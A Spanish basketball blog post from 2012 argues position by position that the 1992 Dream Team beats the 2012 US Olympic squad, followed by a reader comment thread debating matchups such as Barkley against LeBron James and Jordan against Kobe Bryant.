La madre de todos los partidos

13 de September de 2012 por HisRoyalAirness

¡Saludos y bienvenidos al curso baloncestístico 2012-2013!

Este ha sido uno de los veranos en los que hemos podido paliar un poco el síndrome de abstinencia que nos produjo el término de la temporada NBA.  Gracias a  la celebración de los JJOO de Londres y del 20º aniversario de los de Barcelona, la información y los análisis baloncestísticos no han cesado. Sin duda el tema estrella del verano han sido las declaraciones de Kobe Bryant en las que afirmaba que la actual selección USA podía ganar un partido al mítico Dream Team del 92. Esto ha generado un debate sobre el que han corrido ríos de tinta, multitud de análisis y cruces de declaraciones a tutiplén en medios nacionales y extranjeros. Posiblemente más de uno ha tenido que apretar los puños leyendo o escuchando a algún periodista sin la más mínima idea del tema pretendiendo sentar cátedra sobre la materia.

Como no podía acudir a mi lugar de desahogo habitual (o sea, vosotros) se me ocurrió hacer mi propio análisis intentando eliminar de mi cabeza todo rastro de mitomanía , prejuicios y generalizaciones. La idea era, desde la mayor objetividad posible pero sin abusar de las estadísticas, analizar los duelos individuales, el posicionamiento táctico y la inteligencia, eso que los yankees llaman “basketball IQ”, de ambos equipos.

La idea es analizar por posiciones las 2 plantillas, valorar (y esto es lo más polémico) los duelos individuales y emitir un veredicto sobre qué equipo es superior.

Uno de los errores más extendidos en los análisis veraniegos fue el  de comparar a cada jugador en su mejor momento. Aquí no se hará. Cómo eran en el 92 y cómo son en el 2012. Punto.

Así que vamos a intentar disputar un partido imaginario que, por muy cómico que resulte, a todos nos gustaría presenciar y hasta más de uno le gustaría apostar en los sports betting.

PG/ BASE

Se dice que esta generación, la actual, es una de las mejores que ha dado la NBA en cuestión de bases. No voy a demostrar lo contrario. Sin embargo hay algo a señalar: ser muy buenos no significa ser los mejores.

En el Dream Team tenemos al máximo asistente de la historia de la NBA y al jugador con mayor promedio de asistencias por partido. Por si esto no fuera suficiente uno de ellos es también el mayor “ladrón” de todos los tiempos y entre ambos suman 9 participaciones en las Finales y 22 presencias en el All-Star. Como las estadísticas no pretenden ser el centro de este debate pasemos directamente a los duelos.

Antes de nada hay que reconocer que, sin duda, en el plano físico ganan los jugadores actuales. En 1992 Magic ya no era un chaval y Stockton no destacaba precisamente en ese aspecto pese a ser un defensor  fiero y temible.

Magic Johnson vs Chris Paul: Cierto es que Magic estaba un poco entrado en años y que llevaba casi una temporada sin jugar y que Chris Paul es un base excelente. En eso todos estaremos de acuerdo. Pero hablamos del mejor base de todos los tiempos, no de un mindundi. La inteligencia y el espiritu competitivo de Magic han sido superados por muy pocos jugadores y CP3 no es uno de ellos. No veo superior al Chris Paul del 2012 sobre el Magic del 92 en ningún aspecto. Las carencias físicas que pudiera tener las suplía con veteranía y creo que, ni en sus mejores sueños, Paul podría defender a un base de 2’05.

John Stockton vs Deron Williams: Posiblemente aquí debería entrar Russell Westbrook pero en ningún momento ejerció en Londres como director de juego. En este duelo me ocurre un poco lo mismo que en el anterior. Pese a que John Stockton no gozó  de gran cantidad de minutos en el 92, era un base joven y talentoso, repartía 13 asistencias por partido en la temporada 91-92 y es, históricamente, uno de los grandes. Deron aún no ha llegado a su cima y puede que John en aquel momento tampoco.

Punto para el Dream Team (1-0)

SG / ESCOLTA

Decían en las tertulias veraniegas que ésta era, a priori, la demarcación más equilibrada. Increíble. Ya no es sólo que, si comparamos a Michael y a Kobe en su mejor momento, el 23 de los Bulls es muy superior al jugador de los Lakers, es que además el Jordan del 92 es el mejor jugador de la historia y el Kobe del 2012 no es el Kobe del 2008.

Michael Jordan vs Kobe Bryant: Decir que un emparejamiento del jugador más grande de todos los tiempos, a los 28 años, con otro (el que sea) está equilibrado es una blasfemia y una necedad. Ya sólo por la asfixiante defensa que imprimía Jordan sobre jugadores como Kukoc o Petrovic la comparación cae por su propio peso. Cuerpo encima en toda la pista, con los brazos en continuo movimiento. Esa defensa marcaba diferencias. Si queréis abrir debate al respecto lo entiendo pero, en mi opinión, no hay color. Mejor anotador, mejor pasador, mejor físico, mejor defensa. Mejor, en resúmen. Esto no es un desprecio a la “Mamba Negra”, ni mucho menos, un jugador como la copa de un pino pero Michael no está en la misma dimensión que los demás.

Clyde Drexler vs Westbrook / Iguodala / Harden: Puede que Drexler sea uno de los grandes olvidados del Dream Team e incluso de la NBA pero seguramente sea uno de los shooting guards más completos de la historia y un merecidísimo Hall of Fammer. Aún así creo que este duelo puede estar más igualado debido a la juventud de los chicos de los Thunder y el actual jugador de los Nuggets.

¿Veredicto? MJ decanta cualquier balanza. Punto para el Dream Team (2-0).

SF / ALERO

La madre de todos los debates, y con razón. La potencia de fuego mostrada en el puesto de 3 por los yankees este verano ha sido lo nunca visto. Es, con diferencia, su posición mejor cubierta. Es cierto que todos han alternado los puestos de 3 y de 4 pero son en esencia aleros. Anotación exterior, de media distancia, penetradores feroces, rebote, talla y como postre la visión de juego de Lebron James. Un despliegue de talento en toda regla.

Dado que esta posición ha sido la más inespecífica tanto en la selección actual como en la del 92, conviene un análisis más generalizado que un “versus” como en los anteriores.

Por supuesto que Larry Bird ya no estaba para muchos trotes y, seguramente, su espalda no estaría en condiciones de perseguir a fieras como Durant o James (posiblemente los 2 mejores jugadores del mundo en la actualidad) por toda la pista. En todo caso, esto sería simplemente por edad. Si fuese el Bird de los ochenta no apostaría contra él bajo ningún concepto.

Pero esto no termina en el “pájaro”  de los Celtics que, además, ni siquiera era titular. Parece que se ha omitido demasiado al que, con toda seguridad, puede ser el único jugador de la historia con el talento, el físico y los fundamentos defensivos capaces de detener a estas fuerzas de la naturaleza llamadas Lebron James, Kevin Durant y Carmelo Anthony. Hablo, por supuesto, del gran Scottie Pippen, uno de los mejores defensores de la historia.

Chris Mullin creo que sería alguien a considerar seriamente porque parece que siempre ha sido un jugador secundario en estas tertulias y puede que, aunque no decantase la balanza en favor de los del 92, su importancia sea mayor que la que se le da. Cierto es que su impacto en el Dream Team se limitaba al tiro exterior y por eso no se valoran sus otros talentos. Espero que podamos discutir largo y tendido sobre el puesto de SF.

Aún así sería injusto menospreciar a 3 jugadores de semejante calibre. Creo que en este caso el punto para los chicos de 2012 es más que justo (2-1).

PF / ALA-PÍVOT

¿Hay dudas? Junto con Tim Duncan el Dream Team contaba con los 2 mejores Power Forwards de los últimos 40 años, con permiso del gran Kevin McHale y de Elvin Hayes.

Charles Barkley vs Kevin Love: el que siga un poco el hilo sabe que “Sir Charles” Barkley es una de mis debilidades. Una anomalía de la naturaleza, un talento descomunal dentro de un físico imposible. Un ala-pívot de METRO NOVENTA Y SEIS (sí, lo pongo en mayúsculas porque es menester que todos lo recuerden) capaz de promediar 25 puntos (con más de un 50 por ciento de acierto), 12 rebotes, 5 asistencias y 1’5 robos el año siguiente a los JJOO y llevarse su correspondiente MVP de la temporada. Fue el máximo anotador del Dream Team y puede que el mejor jugador de la competición.

No pretendo menospreciar a Kevin Love, para mí un top 5 de la NBA en estos momentos, pero creo sinceramente que “el gordo” podría comerle la moral hasta casi hacerle llorar. La versatilidad del de los Wolves radica en su rango de tiro y su rebote, cosas en las que Charles era igual o mejor, y además es más lento para las transiciones ataque y defensa y un peor jugador en el poste bajo.

Christian Laettner vs Anthony Davis: Empate técnico. Los 2 agitaban las toallas con estilo.

Y aún queda Karl Malone

Punto para el Dream Team (3-1).

C / PÍVOT

Llegados a este punto echemos cuentas de cómo va el tanteo. Se decía que el gran poderío de los del 92 frente a los actuales era el juego interior y, sin contar aún a los centers, ya estamos 3 a 1.

David Robinson vs Tyson Chandler: Me parece que esto no hay por donde cogerlo. Ni por físico, ni por defensa, ni por actitud, ni por anotación. El de los Spurs fue tan superior a lo que Chandler será jamás que no sé si alguien tiene duda alguna y, en caso de existir, tendríamos en el banquillo a Pat Ewing para zanjarla, que se había cascado 24 puntos y 11 por partido en la Regular Season.

OTROS ASPECTOS A TENER EN CUENTA

Basketball IQ: Larry Bird, MJ, Magic Johnson, Barkley, Pippen o John Stockton son unos de los tíos más listos que han pisado el parqué alguna vez. No se trata de la visión de juego o la capacidad para asistir sino de la inteligencia propiamente dicha, el saber cuándo y cómo pasar, dónde situarse, cuándo cargar el rebote ofensivo o sacar una falta en ataque. Es gente que ha dado un “clínic” al respecto en cada partido de su vida, incluso muy entrados en años. Posiblemente es ese “algo” que les falta en ocasiones a jugadores como Carmelo Anthony, Russell Westbrook o incluso a Kobe Bryant. La inteligencia baloncestística era algo muy superior en el equipo de Barcelona 92.

Clutch: Kobe Bryant, Carmelo Anthony o Kevin Durant son jugadores de momentos límite, excelentes bajo presión y que se mueven como peces en el agua en los últimos minutos del partido. Pero hay 4 palabras que invalidan todos sus logros: Michael Jordan y Larry Bird. ¿Con quién os jugariais vuestro último tiro? Pues eso.

El físico o capacidad atlética: Se habla mucho de la capacidad física en la actual NBA y puede que en términos generales la cosa haya mejorado. Pero no creo que Pippen, Jordan, Malone, Robinson, Drexler o Barkley tengan nada que envidiar a los actuales miembros del USA Team en ese aspecto. No creo que este sea un argumento a favor.

El “trash talk”: si este fuese un tema para apoyar una de las 2 candidaturas creo que sólo Carmelo y Chris Paul podría intentar meterse en la cabeza de alguno de sus ancestros y dudo que lo consiguiesen. Larry Bird, aunque fuese desde el banquillo, y Jordan son 2 de los mayores comecocos que ha habido en la liga (palabras literales de Barkley en la cadena TNT). Según Reggie Miller, uno de los mayores bocazas que ha existido, Jordan era el único al que nunca hablaba. Esto puede darnos una idea de lo que intimidaba a sus rivales.

Chuck Daly vs Mike Krzyzewski (sí, está  bien escrito, lo he buscado en Google): con todos mis respetos hacia Coach K y sabiendo que es un mito en el baloncesto universitario, creo que el tipo que fue capaz de llevar un vestuario con Thomas, Rodman, Bill Laimbeer y Rick Mahorn, saliendo con 2 anillos y siendo el artífice de las barriobajeras “Jordan Rules” merece mucho más. Salió  airoso de la primera experiencia con estrellas profesionales antes de que jugar fuese un objetivo entre los pros y trató con los mayores egos que ha dado el deporte internacional en los últimos años (con permiso de Iverson).

Nadie duda de que un partido a 4 cuartos puede ganarlo cualquiera y está claro que la actual campeona olímpica tiene un equipo histórico y espectacular. Por supuesto que en un solo encuentro cualquier contrincante podría salir airoso. Pero la comparativa es más global y se le ha pretendido dar más trascendencia que el mero duelo entre dos equipos.

Estando como están, separados 20 años en el tiempo, es posible que el Dream Team sea el mejor equipo de la historia de cualquier deporte, la alineación de astros más espectacular que se ha dado nunca convergiendo en la misma época y las mismas circunstancias. Por ello es tan dado a generar supuestos sucesores, por pura nostalgia.

Barcelona 92 fue el final de la que muchos denominan como edad de oro de la NBA, el broche perfecto para la imperecedera rivalidad ochentera entre Magic y Bird y el relevo generacional entre estos y los Bulls de Jordan. La guinda perfecta para una época de leyenda.

Comenta

33 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Lógicamente, sin Wade, Bynum y Howard, para mí este comparación no tiene sentido, y si alguien ha intentado hacerla después de todo el río de bajas del dream team actual, se ha equivocado. Obviamente, el dream team de Barcelona es necesariamente el mejor equipo de la historia y discutir eso contra un equipo que pudo haber perdido perfectamente contra España en la final este verano, es una herejía y debería estar prohibido.

    Ahora bien, por aquí tuvimos el debate serio mucho antes de que empezaran a borrarse de la convocatoria por lesiones y demás. Jordan-Drexler / Bird-Pippen / Barkley-Malone es la quinta esencia del baloncesto, pero Wade-Bryant-Harden / Carmelo-Lebron-Durant /Love-Bosh…. en fin, no tienen el mismo halo de los de entonces pero son canela fina, con Lebron haciendo de tres y de cuatro. me gustaría muchísimo ver a Lebron contra Barkley. Ahí saltarían chispas. O no? Es tan superior Barkley a los cuatro de ahora, o realmente has obviado a drede que Lebron hubiera jugado ese partido sobre el gordo? No sé, ese 4-1 a favor del dream team del 92 me parece exagerado, acaso un 3-2 por eso que te digo que Estados Unidos de ahora ganaría en el 3 y en el 4 (si hubiera ido Bosh podría crearle problemas desde fuera a Malone) y Lebron con Gordo podría luchar a muerte (Lebron decantaría esa posición a mi juicio igual que Jordan la de dos). La de 1 no tiene ni sentido compararla, quien piense que Paul, Williams y Westbrook (sin Rose ni Rondo…) hubieran podido hacer algo ante los dos mejores bases de la historia del baloncesto… está pirado completamente. Rose por lesión y Rondo porque USA Team es gilipoyas, ya que para mí es el mejor base actual, hubieran dado algo de guerra, pero Magic era símplemente lo más sagrado del baloncesto, y lo pongo a la altura de su majestad en el halo de gran mito.

    La posición de uno y de dos está clara para el dream team de Barcelona. Wade y Bryant son increíbles, pero no están a su mejor nivel y como bien dices Jordan era dios en aquella época. El 2-0 y el 2-1 por los aleros actuales, comparto al cien por cien.

    En la posición de 4 ya te digo que la comparación está coja, no por el equipo real repito, sino en uno ideal de USA actualmente sin las bajas, y porque no comentas que Lebron habría cogido por banda al señor Barkley, y perdóname si ofendo a gordo… pero Lebron es mucho mejor que él.

    Ahí va el empate, a mi juicio, y el puesto de 5, si hubieran ido Bynum y Howard, pues hombre, me siguen pareciendo mucho mejores Robinson-Ewing (Akeem se nacionalizó un año después), pero los cincos de USA Team 2012 habrían dado guerra.

    Ya digo, si la comparación la hacemos por generaciones y potencial real de ambas escuadras con Olajuwon en vez de Laettner, Thomas en vez de Mullin, Bosh en vez de Iguodala, y Bynum-Howard en vez de Davis y Chandler, saldría un merecido 3-2 para los del 92, pero no por muchísimo. Repito que el puesto de 4 me sigue pareciendo para los de ahora, y sé cual era el calibre de Barkley y de Malone, pero Lebron es demasiada tela men…

      Citar

  2. HisRoyalAirness dice:
    #2

    Pues no sé que decirte tío. Entiendo lo que dices e incluso puedo entender que Lebron sea mejor jugador que Barkley en general (de lo que no estoy convencido) pero no es, ni de lejos tan buen power forward como el gordo. Por supuesto que podría defenderlo y saltarían chispas pero no creo que James marcase diferencias. Podría darse un empate pero es que Barkley en aquella época era un barbaridad, para mí de lo mejor que he visto y, en mi humildísima opinión, mejor que Lebron (jugando de 4, ojo)

      Citar

  3. Pop dice:
    #3

    En el NBA2K lo ponía a enfrentarse entre ellos y el 92 ganaba xD.

    Sancho, eso de que Bosh le hubiera causado problemas a Malone me ha llegado al alma…

      Citar

  4. HisRoyalAirness dice:
    #4

    Uf Sancho, no me había fijado en lo que dice Pop. Creo que Bosh no le haría ni cosquillas a Malone ni por dentro, ni por fuera, ni jugando a las canicas. Además de que le sacaba como 15 kilos

      Citar

  5. simon dice:
    #5

    Para mi la puntuación de 4-1 a favor de USA 92 me parece totalmente ajustada, Lebron digamos que jugando de 4 es igual a Barkley ( por darle a Lebron el beneficio de la duda pues no lo hemos visto demasiado en esa posición ) pero Malone haría varios hijos a Bosh y a su mujer con solo 10 minutitos que los enfrentaran…

      Citar

  6. Melo15 dice:
    #6

    No tengo tan claro que Barkley fuera mejor que Lebron, obiamente era mejor en el poste pero James es mas atletico y creo que lo habria rebasado una y otra vez desde el perimetro, pero para mi ai se acaban las ventajas para los del 2012 porque apesar de que Bosh si podria haber sacado a Malone con su velocidad y tiro no hay comparacion. La unica duda que tengo es si Magic estaba en su mejor estado de forma porque fue en 1991 cuando se le diagnostico el VIH. Para mi esta comparacion no tiene mucho sentido porque la diferencia entre pivots es demasiado, comparados con Ewing y Robinson, Chandler no es nadie.

      Citar

  7. Pop dice:
    #7

    Melo15:
    porque apesar de que Bosh si podria haber sacado a Malone con su velocidad y tiro no hay comparacion.

    Melo, Malone era terriblemente rápido, bastante más que Bosh. Vamos, los contraataques Stockton-Malone eran imparables entre otras cosas porque el Cartero movía 115 kilos a toda velocidad. Quizás Bosh tenga más rango de tiro exterior (y no lo tengo muy claro). De los demás aspectos de juego mejor no hablar para salvaguardar la dignidad de Bosh.

      Citar

  8. Pop dice:
    #8

    En lo demás estoy totalmente de acuerdo con tu comentario, lo único que si tienes dudas acerca del estado de Magic mírate los partidos de Barcelona’92 y verás como se reía de los demás bases. Claro que contra Paul sería diferente.

      Citar

  9. Viva_Dirk dice:
    #9

    En el global creo que no hay debate, los del 92 son mucho mejores.

    Ahora bien, decir que Barkley es mejor que Lebron es entrar en la mitificación de un tio que molaba un montón y evidentemente era una máquina. Dice HisRoyal que ‘Barkley en aquella época era una barbaridad’, es cierto, la temporada siguiente a los juegos hace 25-12-5 y pierde la final contra los Bulls en unos play-offs donde se va a casi 27-14. Eso es una pasada pero es que no se le da a Lebron la dimensión que merece, Lebron llega a los juegos 2012 con 3 MVP’s y un anillo, en los play-offs que haga el anillo hace 30-10-5.5 y 2 robos, con 2-3 abajo y partido en el Garden hace 45 puntos, 15 rebotes y 5 asistencias, y en el 5º contra los Thunder un triple doble.

    Hace tiempo que aguantaba la comparación con un tio como Barkley, después de la última temporada de Lebron, que es comparable a las mejores de la historia de cualquier jugador, es un hecho que ha subido al siguiente nivel.

    También me ha sonado muy tópico decir que Kobe no tiene Basketball IQ, diciendo en la misma frase que Barkley si lo tenia, mas extraño aun.

      Citar

  10. HisRoyalAirness dice:
    #10

    Viva no he dicho que Kobe no tenga basketball IQ, al menos no era eso lo que pretendía expresar. Pero creo que el nivel de Jordan, Bird o Magic es algo supremo y también el de Pippen. Creo que todos hemos visto a Kobe tirar partidos a la basura por empeñarse en tirar TODO en los últimos minutos, con una selección de tiro nefasta.

    Y lo de Barkley no es mitificación, es uno de los jugadores más inteligentes que yo he visto. Creo que la dimensión de Lebron está claramente reflejada y yo los he puesto al mismo nivel aunque me gustaría señalar, intentando no quitar méritos, que le Conferencia Este en la que juega Lebron no es la Este o la Oeste en la que jugó Barkley. Por favor, llega a Playoffs cualquier equipo y el nivel es lamentable, salvo los 3 equipos de arriba. Haciendo el equipo que han hecho tienen asegurado llegar a la Final siempre.
    Y Barkley perdió las Finales, sí, con un equipo bastante lamentable (que no sé ni cómo llegaron) y contra uno de los mejores equipos de la historia en el mejor momento del mejor jugador de la historia entrenados por el mejor entrenador de la historia.
    He intentado ser objetivo, he valorado a Lebron como el jugadorazo que es pero también me gustaría ver a Chuck en un equipo con Bosh y Wade, a ver lo que pasaba

      Citar

  11. TheDeerHunter dice:
    #11

    Fabuloso análisis. Enhorabuena!!!

    Estoy de acuerdo en la esencia con las conclusiones… sin embargo quiero posicionarme con ciertos matices/divergencias.

    – Para mí no sólo no es increíble que se diga que la posición de 2 es la más reñida. Es una evidencia.
    Kobe para mí roza el top 5 histórico. El mejor jugador de principio de siglo. Le puede mirar a la cara a Jordan en la mayoría de aspectos e incluso le supera en alguno. No creo que se esté arrastrando precisamente a esta edad ni remotamente que lo haya hecho estas olimpiadas.
    Westbrook ha sido un puñal este curso. Casi imparable.
    Jordan es Jordan y aciertas con tu percepción de Drexler. Punto para el Dream Team pero no creo por tanto como insinúas.
    – Veo complicada la comparación de aleros puros. Los de ahora no se han comportado específicamente como tal. En Fiba, con la línea de 3 tan cerca y las dimensiones, ahora mismo es un recurso prioritario el alero tirador de 4 y ellos se aprovechan que los tienen muy buenos. Un punto a favor de los actuales.
    – Has olvidado mencionar a Garnett en eso de los mejores power-forwards de los últimos 40 años. Como decía no termino de ver la comparación que se ha hecho, porque los actuales no han jugado con una configuración clásica. De todas formas es evidente que los 4’s de Barcelona superan en mucho a los 4’s nominales de ahora, como así el juego interior que era una berracada difícil que veamos alguna vez superar.
    En NBA sería una ventaja definitiva para ellos, pero en FIBA no sabría decirlo.

    En cualquier caso, simplemente con que se plantee el debate queda bastante claro el nivel de esta selección americana y el mérito de los nuestros.

    Por cierto… en el 2k13 vamos a poder enfrentar a estas dos selecciones al completo. Por fin con Barkley…

      Citar

  12. Viva_Dirk dice:
    #12

    HisRoyalAirness:
    Viva no he dicho que Kobe no tenga basketball IQ, al menos no era eso lo que pretendía expresar. Pero creo que el nivel de Jordan, Bird o Magic es algo supremo y también el de Pippen. Creo que todos hemos visto a Kobe tirar partidos a la basura por empeñarse en tirar TODO en los últimos minutos, con una selección de tiro nefasta.

    Y lo de Barkley no es mitificación, es uno de los jugadores más inteligentes que yo he visto. Creo que la dimensión de Lebron está claramente reflejada y yo los he puesto al mismo nivel aunque me gustaría señalar, intentando no quitar méritos, que le Conferencia Este en la que juega Lebron no es la Este o la Oeste en la que jugó Barkley. Por favor, llega a Playoffs cualquier equipo y el nivel es lamentable, salvo los 3 equipos de arriba. Haciendo el equipo que han hecho tienen asegurado llegar a la Final siempre.
    Y Barkley perdió las Finales, sí, con un equipo bastante lamentable (que no sé ni cómo llegaron) y contra uno de los mejores equipos de la historia en el mejor momento del mejor jugador de la historia entrenados por el mejor entrenador de la historia.
    He intentado ser objetivo, he valorado a Lebron como el jugadorazo que es pero también me gustaría ver a Chuck en un equipo con Bosh y Wade, a ver lo que pasaba

    Con el tiempo suelen pasar estas cosas. Los Suns que jugaron aquella final eran un equipazo, Kevin Johnson y Majerle ya habian sido All-Stars, Ceballos estaba ya en su tercer año, tenian buenos veteranos como Ainge y Chambers, y una superestrella como Barkley, no tenian center, como no lo tenian los Bulls. Y ahora se infravalora a un equipo como los Celtics que llevaron a los Heat al septimo…bueno, que Lebron los llevó a ellos al septimo con un partido legendario. Precisamente aquella conferencia Oeste no era de lo mas temible, los Lakers se clasificaron como 8ºs con un balance de 39-43, de hecho, de los 3 rivales en playoffs de los Suns en el 93, ninguno tiene el nivel de los Celtics de 2012.

    Lo que ha hecho Lebron esta temporada y sobre todo en estos playoffs jamás lo hizo Barkley ni parecido.

      Citar

  13. Denise dice:
    #13

    No puedo opinar porque a los del 92′ no los ví en directo, y aunque podría ver sus videos, no me parece lo mas apropiado opinar con unos highlights o “las mejores jugadas/canastas de …”; lo unico que digo, es que, no sé si este será el caso, pero muchas veces en el deporte y sobre todo en la música, tendemos a mitificar y endiosar lo acontecido en las décadas de los 70′ y los 80′; y tratar a lo de esta época como algo inferior o directamente una basura.
    Supongo que esa tendencia se mantendrá y lo actual no se valorará hasta 2030.

      Citar

  14. TheDeerHunter dice:
    #14

    Qué hay Denise…
    ¿porqué dices que lo actual no se valora?

      Citar

  15. HisRoyalAirness dice:
    #15

    Gracias Deer! Se hace lo que se puede!
    Un apunte: para mí Kobe es un jugador legendario, no quiero que nadie crea que opino lo contrario, pero, pese a que creo que es junto a Michael el mejor 2 de la historia no veo esa igualdad. Cierto es que aún está a un nivel espectacular pero creo (mi opinión, por supuesto) que el Jordan del 92 está a un nivel tan por encima del resto, sus números, su nivel y su competitividad que se me hace difícil que alguien pudiese toserle.

    Viva, me da rabia que pienses que utilizo argumentos tan livianos como “olvidarme” de lo que eran aquellos Suns o ignorarlos porque me quedan muy lejos. En absoluto. Creo que es uno de los 3 equipos de los que màs partidos he visto y me encantan, el término “lamentable” lo utilizo porque por mucho que Ceballos, Majerle o Ainge fuesen buenos jugadores no son comparables, ni de lejos, a Wade o Bosh.
    Y actuaciones legendarias de Barkley puedo sacar bastantes a la palestra, incluyendo varios partidos de playoffs con los mismos números, o mejores, que los de James contra los verdes.
    Y no menosprecio a estos Celtics para nada, creo que los 4 primeros de la conferencia Este son de un nivel espectacular pero creo que es una realidad que el nivel medio es bajo.
    Puede que la Conferencia Oeste de los Suns del 92 no fuese gran cosa en términos generales pero la Este en la que Chuck competía con los Sixers era un escàndalo

      Citar

  16. HisRoyalAirness dice:
    #16

    Por cierto Denise, yo nunca emito juicios viendo videos de Highlights en youtube. En esos videos puedo parecer bueno hasta yo.
    Hay varias páginas con partidos completos accesibles, en mi opinión la única forma coherente de informarse al respecto.

    Ah, y cuando me digas un sólo grupo de música actual que pueda ser comparable a los Rolling, Pink Floyd, Led Zeppelin, Police etc podemos abrir el debate musical. Hay veces que sí es cierto lo de que tiempos pasados fueron mejores

      Citar

  17. melo15 dice:
    #17

    Te importaria Magic decirme una de estas paginas, te lo agradeceria.

      Citar

  18. Pop dice:
    #18

    Lo de mirar en qué momento estaba cada jugador para enfrentarlos vale en los 2 sentidos ¿no? Que Kobe a nivel histórico esté más o menos cerca de Jordan es todo lo defendible que se quiera. Pero Jordan’92 vs Kobe’12 es indefendible, hombre.

    Sólo con las frías estadísticas: Jordan’92: 30’1 ppp/6’4rpp/6’1app/2’3 rpb 52%fg. En PO: 34’5 ppp /6’2/5’5/ 2.0rob 50%fg. Campeón NBA, MVP y MVP de las Finales. Mejor quinteto y Mejor quinteto defensivo.

    Kobe’12: 27’9ppp / 5’4/ 4’6/ 1’2 43%fg. En PO: 30.0/4’5/4’3/1’2 43%fg. Mejor quinteto, 2ºmejor quinteto defensivo.

      Citar

  19. Pop dice:
    #19

    melo15:
    Te importaria Magic decirme una de estas paginas, te lo agradeceria.

    http://www.youtube.com/watch?v=A1wo-mKpAEo

    Aquí tienes el USA-LITUANIA de Barcelona’92, Melo.

      Citar

  20. Blade Petrovic dice:
    #20

    melo15:
    Te importaria Magic decirme una de estas paginas, te lo agradeceria.

    A mi tambien porfavor

      Citar

  21. HisRoyalAirness dice:
    #21

    Pop:
    Lo de mirar en qué momento estaba cada jugador para enfrentarlos vale en los 2 sentidos ¿no? Que Kobe a nivel histórico esté más o menos cerca de Jordan es todo lo defendible que se quiera. Pero Jordan’92 vs Kobe’12 es indefendible, hombre.

    Sólo con las frías estadísticas: Jordan’92: 30’1 ppp/6’4rpp/6’1app/2’3 rpb 52%fg. En PO: 34’5 ppp /6’2/5’5/ 2.0rob 50%fg. Campeón NBA, MVP y MVP de las Finales. Mejor quinteto y Mejor quinteto defensivo.

    Kobe’12: 27’9ppp / 5’4/ 4’6/ 1’243%fg.En PO: 30.0/4’5/4’3/1’2 43%fg.Mejor quinteto, 2ºmejor quinteto defensivo.

    A esto me refiero yo

      Citar

  22. HisRoyalAirness dice:
    #22

    melo15:
    Te importaria Magic decirme una de estas paginas, te lo agradeceria.

    Hablas conmigo melo?

      Citar

  23. HisRoyalAirness dice:
    #23

    Blade Petrovic: A mi tambien porfavor

    Bueno, por si va por mí: creo que esta es la mejor página para bajar partidos. Tienen cientos y muy bien ordenados

    allsports-tv . com/c1-nba

      Citar

  24. Melo15 dice:
    #24

    Si nose porque siempre me confundo

      Citar

  25. Denise dice:
    #25

    HisRoyalAirness:
    Por cierto Denise, yo nunca emito juicios viendo videos de Highlights en youtube. En esos videos puedo parecer bueno hasta yo.
    Hay varias páginas con partidos completos accesibles, en mi opinión la única forma coherente de informarse al respecto.

    Ah, y cuando me digas un sólo grupo de música actual que pueda ser comparable a los Rolling, Pink Floyd, Led Zeppelin, Police etc podemos abrir el debate musical. Hay veces que sí es cierto lo de que tiempos pasados fueron mejores

    No he dicho que tu hayas tirado de highlights, no se por qué lo tomas a la defensiva, he dicho que yo no opino porque no los he visto, solo podria ver higlights y con eso no opino. Sé que en Internet es facil de ver cualquier cosa, incluido partidos completos de los 90′ pero no tengo tiempo para eso.

    Y sin querer hacer off-topic, en mi opinión, esos grupos que nombra están sobrevaloradisimos. Ojo, no digo que sean malos, solo que están endiosados. Si esos grupos no fuesen de los 80′ y fuesen de esta época, no tendrían ni la mitad de repercusión que tienen. Y, ya sé que es cuestión de gustos y no hay nada subjetivo, pero los Rolling y U2 para mí son las mayores estafas musicales, los 2 grupos mas sobrevalorados de todos los tiempos.

      Citar

  26. Denise dice:
    #26

    TheDeerHunter:
    Qué hay Denise…¿porqué dices que lo actual no se valora?

    Si se valora, pero sin llegar a mitificarse. Creo que la sociedad no acepta como mitos a la gente hasta que no lleva como 10 años retirado.
    Por ejemplo, pongamos a Pau Gasol. En esta nación, a pesar de su palmarés y trayectoria; todavía lees multitud de comentarios diciendo “es un blando”, “esta acabado”, “nunca ha sido tan bueno”, “xxxx es mil veces mejor que él” y cosas así….
    No sé, no me imagino en 2025 a alguién discutiendo la calidad de Pau. Y más aún, si en ese momento no hay jugadores de nivel y la selección no pasa de cuartos.

      Citar

  27. Viva_Dirk dice:
    #27

    La cuestión con ‘lo actual’ es que aun no se sabe lo grande que puede ser en muchos casos(caso de Lebron, Durant o Love por decir algunos), y de lo que ha pasado ya sabemos todo.

    Respecto a Gasol, pocas veces habrás oido al gran público de esta nación criticarlo, y entre los que somos seguidores de la NBA sabemos que a veces ha sido un blando, que hizo unos playoffs lamentables, que los hay xxxx veces mejores que el y a la vez de todo eso sabemos que es un grande y que dificilmente volveremos a ver un jugador español con su carrera en la NBA.

      Citar

  28. Denise dice:
    #28

    Viva_Dirk:
    La cuestión con ‘lo actual’ es que aun no se sabe lo grande que puede ser en muchos casos(caso de Lebron, Durant o Love por decir algunos), y de lo que ha pasado ya sabemos todo.

    Respecto a Gasol, pocas veces habrás oido al gran público de esta nación criticarlo, y entre los que somos seguidores de la NBA sabemos que a veces ha sido un blando, que hizo unos playoffs lamentables, que los hay xxxx veces mejores que el y a la vez de todo eso sabemos que es un grande y que dificilmente volveremos a ver un jugador español con su carrera en la NBA.

    Quizás sea eso, pero tengo la sensación de que las cosas no se valoran en su justa medida hasta que se pierde, en este caso, hasta que se retiran.

      Citar

  29. nba dice:
    #29

    No se que tendra ET Gasol, pero parece que en todos los debates que salen , da igual de que sean, siempre sale a colacion su nombre.
    Evidentemente el paso del tiempo cambia la perspectiva y apreciacion , si hasta a Magic en su etapa de Lakers le daban palos, pues todo es comprensible.
    Yo sigo pensando que el dream team de Barcelona me parece incomparable, es que me imagino al gran Malone haciendo los bloqueos y a Love/Howard/Griffin/Bosh saliendo despedidos del impacto, y solo ese jugador en esa posicion, el resto ya ni te cuento.
    Y hablar de IQ, ya es una diferencia estratosferica.

      Citar

  30. AndroidMan dice:
    #30

    Como bien dice el análisis y los comentarios posterioris aquí entra en buena parte la mitificación de la generación del Dream Team. Pero igualmente, dudo que los actuales les hicieran sombra en el 92. Siempre estamos hablando del físico y demás, pero pensáis que alguno de los actuales jugadores tiene un físico mucho más portentoso que los de Karl Malone o David Robinson??

    Por cierto, si queréis tener todos los artículos y noticias del mundo del baloncesto en vuestro móvil (esta incluida), no dudéis en descargaros la aplicación TodoBasket:

    https://play.google.com/store/apps/details?id=com.jtcsoft.todobasket

      Citar

  31. Nacho dice:
    #31

